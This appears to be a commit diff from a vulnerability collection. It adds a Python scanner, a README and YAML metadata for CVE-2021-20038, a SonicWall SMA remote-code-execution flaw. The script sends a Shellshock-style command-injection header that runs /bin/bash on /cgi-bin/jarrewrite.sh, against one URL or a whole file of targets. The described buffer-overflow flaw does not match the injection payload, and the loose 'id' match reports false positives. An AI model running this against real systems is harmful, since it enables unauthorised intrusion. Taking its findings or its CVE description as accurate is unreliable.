添加CVE-2021-20038

cve/apache-Httpd/2021/CVE-2021-20038/CVE-2021-20038.py

@@ -0,0 +1,68 @@
+import requests
+import urllib3
+import sys
+from urllib import parse
+
+
+requests.packages.urllib3.disable_warnings()
+
+def banner():
+	print('baby test')
+
+def help():
+	print(' SonicWall RCE -h 查看帮助  ')
+	print(' SonicWall RCE -u 输入待检测url  ')
+	print(' SonicWall RCE -f 输入待检测文件  ')
+
+def poc(url):
+	path="/cgi-bin/jarrewrite.sh"
+	vulnurl=url + path
+	#print(vulnurl)
+	headers = {
+    "User-Agent": "() { :; }; echo ; /bin/bash -c id",      
+}
+	try:
+		res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+		if "id" in res.text and res.status_code==200:
+			print(res.text+url+"is vuln 漏洞存在")
+		else:
+			print(url+"is not vuln 漏洞不存在")
+	except Exception as e:
+		print(e)
+
+def poc1(files):
+	for url in open(files):
+		url=url.strip()
+		path="/cgi-bin/jarrewrite.sh"
+		vulnurl=url + path
+		#print(vulnurl)
+		headers = {
+        "User-Agent": "() { :; }; echo ; /bin/bash -c id",      
+    }
+		try:
+			res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+			if "id" in res.text and res.status_code==200:
+				print("[*] "+res.text+url+"is vuln 漏洞存在")
+			else:
+				print("[*] "+url+"is not vuln 漏洞不存在")
+		except Exception as e:
+			print(e)
+
+if __name__ == '__main__':
+    try:
+    	banner()
+    	print('by baby')
+    	cmd1=sys.argv[1]
+
+    	if cmd1=='-h':
+    		help()
+    	elif cmd1=='-u':
+    		cmd2=sys.argv[2]
+    		poc(cmd2)
+    	elif cmd1=='-f':
+    		cmd2=sys.argv[2]
+    		poc1(cmd2)
+    	else:
+    		print("请输入正确参数，或者-h查看帮助")
+    except:
+    	print("输入-h查看帮助")

cve/apache-Httpd/2021/CVE-2021-20038/README.md

@@ -0,0 +1,9 @@
+# SonicWallSSL-VPN_RCE
+CVE-2021-20038
+
+命令行传参
+-h 查看帮助
+-u 指定url
+-f 指定file文件 
+
+file内部的格式需添加http/https头

cve/apache-Httpd/2021/yaml/CVE-2021-20038.yaml

@@ -0,0 +1,19 @@
+id: CVE-2021-20038
+source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE
+info:
+  name:SonicWall 安全移动接入 (SMA) 系列解决方案简化了端到端安全远程访问，可跨本地、云和混合数据中心访问托管的资源，对应用程序实施策略访问控制，在用户和设备标识之间建立信任关系，之后可对应用进行多层安全控制，让用户可随时随地安全工作。
+  severity: critical
+  description: |
+    A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+  scope-of-influence:
+    SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-20038
+    cwe-id: CWE-787, CWE-121
+    cnvd-id: None
+    kve-id: None
+  tags: cve2021,Apache,RCE

other_list.yaml

@@ -40,6 +40,8 @@ cve:
   apache-Struts:
     - CVE-2017-9805
     - CVE-2018-11776
+  apache-Httpd:
+    - CVE-2021-20038
   unzip:
     - CVE-2022-0529
   django: